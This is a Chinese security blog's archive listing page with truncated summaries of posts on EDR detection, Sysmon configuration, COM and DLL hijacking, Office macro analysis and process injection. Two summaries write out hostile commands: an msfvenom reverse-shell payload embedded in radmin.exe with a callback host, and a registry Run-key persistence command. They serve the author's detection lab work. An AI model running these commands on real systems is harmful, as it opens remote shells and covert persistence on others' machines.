上一页 1 ··· 43 44 45 46 47 48 49 50 51 ··· 271 下一页
2022年4月24日
DLL劫持——DLL sideloading 这玩意从EDR检测厂商看,就S1有防护能力
摘要: Sideloading DLL攻击 2021年9月4日06:38:12逆向工程评论111 views787字阅读2分37秒阅读模式 今天看到了国外的一个白皮书,地址如下: https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deplo 阅读全文
posted @ 2022-04-24 14:45 bonelee 阅读(942) 评论(0) 推荐(0) 编辑
微软kql检测——识别编码后的empire脚本
摘要: https://github.com/BlueTeamLabs/sentinel-attack/tree/master/detections ==》这个更全些 https://github.com/Azure/Azure-Sentinel/blob/83c6d8c7f65a5f209f39f3e06 阅读全文
posted @ 2022-04-24 11:05 bonelee 阅读(223) 评论(0) 推荐(0) 编辑
2022年4月22日
Persistence – COM Hijacking COM劫持和检测方法:反正检测注册表是必经之路 【能动手实践】
摘要: from:https://pentestlab.blog/2020/05/20/persistence-com-hijacking/?msclkid=5fdfee8bc15811ec8aa81df895acc3e4 Microsoft introduced Component Object Mode 阅读全文
posted @ 2022-04-22 14:51 bonelee 阅读(268) 评论(0) 推荐(0) 编辑
2022年4月21日
metasploit进程注入 sysmon事件采集示例
摘要: 生成payload:msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe靶机运行r2 阅读全文
posted @ 2022-04-21 15:44 bonelee 阅读(165) 评论(0) 推荐(0) 编辑
VirtualBox配置kali 让宿主机可以SSH远程登录虚拟机 vb真难用啊 粘贴板双向死活配置不好 只能这样共享文件了
摘要: 补充:kali里两个虚拟机之间互相访问设置,https://blog.csdn.net/elie_yang/article/details/88895660,就只需要设置下桥接网络就行! kali里: sudo vi /etc/network/interfaces添加: auto eth0 ifac 阅读全文
posted @ 2022-04-21 10:37 bonelee 阅读(189) 评论(0) 推荐(0) 编辑
2022年4月20日
恶意代码分析之Office宏代码分析——因为现在大部分的office CDE或者AV引擎都可以检测,EDR能做的比较有限了
摘要: 持久化:Office 应用程序启动 子技术 (6) 对手可能会利用基于 Microsoft Office 的应用程序在初创公司之间保持持久性。Microsoft Office 是企业网络中基于 Windows 的操作系统上相当常见的应用程序套件。启动基于 Office 的应用程序时,有多种机制可用于 阅读全文
posted @ 2022-04-20 18:55 bonelee 阅读(1197) 评论(0) 推荐(1) 编辑
2022年4月19日
进程注入数据采集,sysmon可以获得CreateRemoteThread信息,car中进程注入检测方式
摘要: 下载地址:https://www.tarasco.org/security/Process_Injector/processinjector.zip 进程注入(pinjector.exe)提权进程注入将pinjector注入到用户的进程里一起运行,进而同时拥有了对应的权限。是一种比较隐蔽的手段,不会 阅读全文
posted @ 2022-04-19 20:22 bonelee 阅读(417) 评论(0) 推荐(0) 编辑
powercat 果然windows defender实时保护就不让我下载 关闭以后才可以运行
摘要: 阅读全文
posted @ 2022-04-19 15:54 bonelee 阅读(38) 评论(0) 推荐(0) 编辑
我的sysmon配置,默认配置就看到了进程采集,其他数据采集还是要配置下的
摘要: 我的效果: 运行: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v eKey /t REG_SZ /d "powershell -file helloword.ps1" 我的配置文件:Sysmon 阅读全文
posted @ 2022-04-19 15:05 bonelee 阅读(1046) 评论(3) 推荐(0) 编辑
sysmon安装配置及其使用,EDR一些防御case肯定是要看的
摘要: 原文:https://www.jianshu.com/p/43bf5aadfd28 我自己安装成功以后,可以看到采集的日志,运行powershell以后生成的日志: sysmon安装配置及其使用 走错说爱你关注 22021.09.15 11:11:09字数 900阅读 1,366 sysmon是微软 阅读全文
posted @ 2022-04-19 14:45 bonelee 阅读(1492) 评论(0) 推荐(0) 编辑
上一页 1 ··· 43 44 45 46 47 48 49 50 51 ··· 271 下一页